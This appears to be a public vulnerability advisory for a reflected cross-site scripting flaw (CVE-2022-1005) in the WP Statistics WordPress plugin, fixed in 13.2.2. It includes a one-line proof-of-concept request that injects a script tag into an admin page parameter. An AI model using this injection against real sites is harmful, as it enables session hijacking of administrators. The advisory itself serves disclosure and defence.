WP Statistics < 13.2.2 – Reflected Cross-Site Scripting | CVE 2022-1005 | Plugin Vulnerabilities

Description

The plugin does not sanitise the REQUEST_URI parameter before outputting it back in the rendered page, leading to Cross-Site Scripting (XSS) in web browsers which do not encode characters

Proof of Concept

GET /wp-admin/admin.php?page=wps_settings_page&a=<script>confirm(/XSS/)</script> HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [admin+]

Affects Plugins

Fixed in 13.2.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Taurus Omar

Submitter

Taurus Omar

Submitter website

https://taurusomar.com

Submitter twitter

Verified

Yes

WPVDB ID

f37d1d55-10cc-4202-8d16-9ec2128f54f9

Timeline

Publicly Published

2022-05-10 (about 3 years ago)

Added

2022-05-10 (about 3 years ago)

Last Updated

2022-05-11 (about 3 years ago)

Other

Published

Title

Published

2025-04-22

Title

Event post < 5.10.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-12-04

Title

Thai Lottery Widget <= 2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

Published

2025-04-30

Title

Remote Images Grabber <= 0.6 - Reflected Cross-Site Scripting

Published

2023-11-29

Title

Forms by CaptainForm <= 2.5.3 - Reflected Cross-Site Scripting via REQUEST_URI

Published

2022-01-14

Title

Download Monitor < 4.4.7 - Reflected Cross-Site Scripting